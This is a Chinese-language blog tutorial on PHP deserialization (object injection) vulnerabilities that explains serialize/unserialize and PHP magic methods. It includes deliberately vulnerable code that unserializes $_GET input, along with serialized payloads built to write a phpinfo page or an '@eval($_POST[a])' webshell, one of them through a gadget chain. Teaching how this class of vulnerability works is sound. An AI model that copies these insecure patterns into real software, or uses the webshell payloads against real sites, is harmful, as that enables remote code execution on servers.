PHP序列化与反序列化

最新推荐文章于 2024-06-25 14:46:02 发布
最新推荐文章于 2024-06-25 14:46:02 发布
阅读量374 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/116793801
版权

文章目录

一、php反序列化漏洞

1.概述

PHP (从 PHP 3.05 开始)为保存对象提供了一组序列化和反序列化的函数:serialize、unserialize。
php反序列化漏洞,又叫php对象注入漏洞。
什么是php反序列化漏洞呢?简单的来说,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。
漏洞形成原因

2.php序列化与反序列化

序列化:
当我们在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,用于保存对象的值方便之后的传递与使用
函数 : serialize()
序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
php允许保存一个对象方便以后重用,这个过程被称为序列化。
测试代码:

<?php
class chybeta{
	var $test = '123';
}
$class1 = new chybeta;
$class1_ser = serialize($class1);
print_r($class1_ser);
?>

将其序列化后的结果:

O:7:"chybeta":1:(s:4:"test";s:3:"123";)

反序列化:
与 serialize() 对应的,unserialize()可以从序列化后的结果中恢复对象(object),我们翻阅PHP手册发现官方给出的是:unserialize — 从已存储的表示中创建 PHP 的值。
函数: unserialize()
可以从已存储的表示中创建PHP的值。恢复原先被序列化的变量。
测试代码:

<?php
class chybeta{
	var $test = '123';
}
$class2 = 'O:7:"chybeta":1:{s:4:"test";s:3:"123";}';
print_r($class2);
echo "</br>反序列化结果为:</br>";
$class2_unser = unserialize($class2);
print_r($class2_unser);
?>

将其反序列化后的结果:

O:7:"chybeta":1:(s:4:"test";s:3"123"; )
反序列化的结果为:
chybeta Object ( [test] = > 123 )

3.魔术方法的利用

magic 函数
php面向对象变成中,有一类函数叫做magic function,魔术函数,他们是一些当依照某些规则实例化类或者调用某些函数的时候会自动调用这些magic函数,
这里有一些比较常见的例如__construct,__destory,__sleep,__wakeup,__toString函数。

__construct():构造函数,当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。
__destruct():析构函数,类似于C++。会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行,当对象被销毁时会自动调用。。
__wakeup():如前所提,unserialize()时会检查是否存在 __wakeup(),如果存在,则会优先调用。
__sleep():用于提交未提交的数据,或类似的清理操作,因此当一个对象被序列化的时候被调用。
__toString():用于处理一个类被当成字符串时应怎样回应,因此当一个对象被当作一个字符串时就会调用。
__get():调出不可访问(private,protect等修饰)属性时就会被调用。
__set():修改或写入不可访问(private,protect等修饰)属性时就会被调用。
__isset():对不可访问(private,protect等修饰)属性使用empty()或isset()方法时就会被调用。
__unset():对不可访问(private,protect等修饰)属性使用unset()方法时就会被调用。

__wakeup()或__destruct()的利用
由前可以看到,unserialize()后会导致wakeup() 或destruct()的直接调用,中间无需其他过程。因此最理想的情况就是一些漏洞/危害代码在wakeup() 或destruct()中,从而当我们控制序列化字符串时可以去直接触发它们。

<?php
class chybeta{
  var $test = '123';
  function __wakeup(){
  	$fp = fopen("shell.php","w") ;
  	fwrite($fp,$this->test);
  	fclose($fp);
  }
}
$class3 = $_GET['test'];
print_r($class3);
echo "</br>";
$class3_unser = unserialize($class3);
require "shell.php";
// 为显示效果,把这个shell.php包含进来
?>

基本的思路是,本地搭建好环境,通过 serialize() 得到我们要的序列化字符串,之后再传进去。通过源代码知,把对象中的test值赋为 “<?php phpinfo(); ?>”,再调用unserialize()时会通过__wakeup()把test的写入到shell.php中。为此我们写个php脚本:

<?php
class chybeta{
	var $test = '123';
	function __wakeup(){
		$fp = fopen("shell.php","w") ;
		fwrite($fp,$this->test);
		fclose($fp);
	}
}
$class4 = new chybeta();
$class4->test = "<?php phpinfo(); ?>";	$class4_ser = serialize($class4);	print_r($class4_ser);
?>

得到序列化结果:

O:7:"chybeta":1:{s:4:"test";s:19:"<?php phpinfo(); ?>";}

其他Magic函数的利用:
基本思路
向test传入构造好的序列化字符串后,进行反序列化时自动调用 __wakeup()函数,从而在new ph0en1x()会自动调用对象ph0en1x中的__construct()方法,从而把<?php @eval($_POST[a]);?>写入到 webshell.php中。
有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象。
在本地搭建环境(删除之前webshell.php里的内容),index2源码为:

<?php
class ph0en1x{
	function __construct($test){
		$fp = fopen("shell.php","w") ;
		fwrite($fp,$test);
		fclose($fp);
	}
}
class chybeta{
	var $test = '123';
	function __wakeup(){
		$obj = new ph0en1x($this->test);
	}
}
$class5 = $_GET['test'];
print_r($class5);
echo "</br>";
$class5_unser = unserialize($class5);
require "shell.php";
?>

编写exp之后,用serialize函数进行序列化,得到payload

O:7:"chybeta":1:{s:4:"test";s:25:"<?php @eval($_POST[a]);?>";}

普通成员的利用:
基本思路
new一个新的chybeta对象后,调用__construct(),其中又new了ph0en1x对象。在结束后会调用__destruct(),其中会调用action(),从而输出 ph0en1x。
利用
前面谈到的利用都是基于“自动调用”的magic function。但当漏洞/危险代码存在类的普通方法中,就不能指望通过“自动调用”来达到目的了。这时我们需要去寻找相同的函数名,把敏感函数和类联系在一起。一般来说在代码审计的时候我们都要盯紧这些敏感函数的,层层递进,最终去构造出一个有杀伤力的payload。

<?php
class chybeta {
    var $test;
    function __construct() {
        $this->test = new ph0en1x();
    }
    function __destruct() {
        $this->test->action();
    }
}
class ph0en1x {
    function action() {
        echo "ph0en1x";
    }
}
class ph0en2x {
    var $test2;
    function action() {
        eval($this->test2);
    }
}
$class6 = new chybeta();
unserialize($_GET['test']);
?>

构造序列化

<?php
class chybeta {
    var $test;
    function __construct() {
        $this->test = new ph0en2x();
    }
}
class ph0en2x {
    var $test2 = '@eval($_POST[a]);';
}
echo serialize(new chybeta());
?>

得到payload:

O:7:"chybeta":1:{s:4:"test";O:7:"ph0en2x":1:{s:5:"test2";s:17:"@eval($_POST[a]);";}}

注入对象构造
当目标对象被private、protected修饰时的构造方法。
在这里插入图片描述
Session
在这里插入图片描述

存储内容为序列化后的 session:test|s:4:“test”;

不同处理器的格式不同,当不同页面使用了不同的处理器时,由于处理的Session序列化格式不同,就可能产生反序列化漏洞。
参考博客:
PHP反序列化漏洞总结
php反序列化漏洞
浅谈php反序列化漏洞

H0ne
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP反序列化漏洞
m0_57379855的博客
03-12 3076
PHP反序列化漏洞PHP类与对象类对象Magic函数PHP序列化反序列化不同类型的序列化pubilc与private反序列化反序列化漏洞的出现CTF题目分析PHP反序列+文件包含攻防世界Typecho反序列化漏洞PHP反序列化漏洞防御 PHP类与对象 类 一个共享相同结构和行为的对象的集合 对象 类的实例 Magic函数 PHP序列化反序列化 序列化:把对象转化为可传输的字节序列过程称为序列化,可以在任何地方 反序列化:把字节序列还原为对象的过程称为反序列化。 不同类型的序列化 布尔值:b:
php中的序列化反序列化
Neil
03-24 588
<br />1.serialize() <===> unserialize(),这个大家用的最多, 老熟人了<br />session 保存默认用的就是这个.<br /> 如果想存储对象,数组数据等可以用(试试跟var_export()比较)<br /> [php]<br /> session_start();<br /> echo $foo = serialize($_SESSION)<br /> print_r(unserialize($foo));<br /> [/php]<br /><
Web渗透:php反序列化漏洞
最新发布
WolvenSec的博客
06-25 977
反序列化漏洞(Deserialization Vulnerability)是一种在应用程序处理数据的过程中,因不安全的反序列化操作引发的安全漏洞;反序列化是指将序列化的数据(通常是字节流或字符串)转换回对象的过程,如果反序列化操作未进行适当的验证或消毒,攻击者可以通过精心构造的恶意数据进行攻击,执行任意代码、获取敏感信息、或破坏数据的完整性。本文我们就来探讨一下反序列化漏洞产生的原因和漏洞利用方法。
PHP序列化反序列化
qq_31088019的博客
08-25 4203
PHP序列化反序列化及案例
php序列化反序列化
qq_63501912的博客
02-07 1293
php序列化反序列化
PHP的序列化反序列化
一颗小白菜的博客
08-17 550
PHP程序执行结束以后会将文件中的变量和内容释放掉, 如果一个程序想要的调用之前程序的变量,但是之前的程序已经执行完毕,所有的变量和内容都被释放,那该如何操作呢?这时候就可以通过序列化反序列化保存程序中的对象,给其他程序使用。php序列化可以将对象转换成字符串,但只序列化属性,不序列化方法。unserialize()函数的变量可控,php文件中存在可利用的类,类中有魔法函数。[网鼎杯 2020 青龙组]AreUSerialz(BUUCTF)​PHP序列化反序列化函数达到序列化反序列化的目的。...
详解PHP序列化反序列化原理
10-18
首先,要理解PHP序列化反序列化的概念。序列化PHP中将对象或变量的状态信息转换成可以存储或传输的形式的过程,反序列化则是将这些存储或传输后的信息还原成PHP中可以识别的对象或变量的过程。PHP通过serialize...
64-64.渗透测试-PHP序列化反序列化.mp4
05-10
64-64.渗透测试-PHP序列化反序列化.mp4
php json与xml序列化/反序列化
10-26
在Web开发中,数据交换和存储常常涉及到对象的序列化反序列化PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
php序列化反序列化详解
01-20
把复杂的数据类型压缩到一个字符串中 serialize() 把变量和它们的值编码成文本形式 unserialize() 恢复原先变量 eg: $stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);...
PHP序列化反序列化
热门推荐
迷风小白
06-28 1万+
PHP序列化:serialize 序列化是将变量或对象转换成字符串的过程。 举例: <?php class man{ public $name; public $age; public $height; function __construct($name,$age,$height){ //_construct:创建对象时初始化 $this->name =...
PHP反序列化
D-R0s1的博客
10-08 1467
什么是反序列化?   在我们讲PHP反序列化的时候,基本都是围绕着serialize(),unserialize()这两个函数。那么什么是序列化呢,序列化说通俗点就是把一个对象变成可以传输的字符串。举个例子,不知道大家知不知道json格式,这就是一种序列化,有可能就是通过array序列化而来的。而反序列化就是把那串可以传输的字符串再变回对象。 反序列化中的解释: 拿一个神盾局的秘密来实验一下ph...
PHP序列化反序列化(基础篇)
errorr0
03-10 2515
最最最基础的序列化反序列化
php序列化反序列化
iRudder的专栏
01-27 1323
php序列化&反序列化对与一些大文件的压缩操作,读写操作十分有用。 一个简单的序列化案例 同时用到了序列化反序列化函数,二者在被调用时会分别自己调用对应的函数,__sleep 以及__wakeup. <?php /* __sleep和__wakeup练习题: 故事:一个果农生产了很多水果种类,于是需要把一个买家指定的种类寄给他,生产的日期和寄给买家的日期 水果类(几个成员,苹果种
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值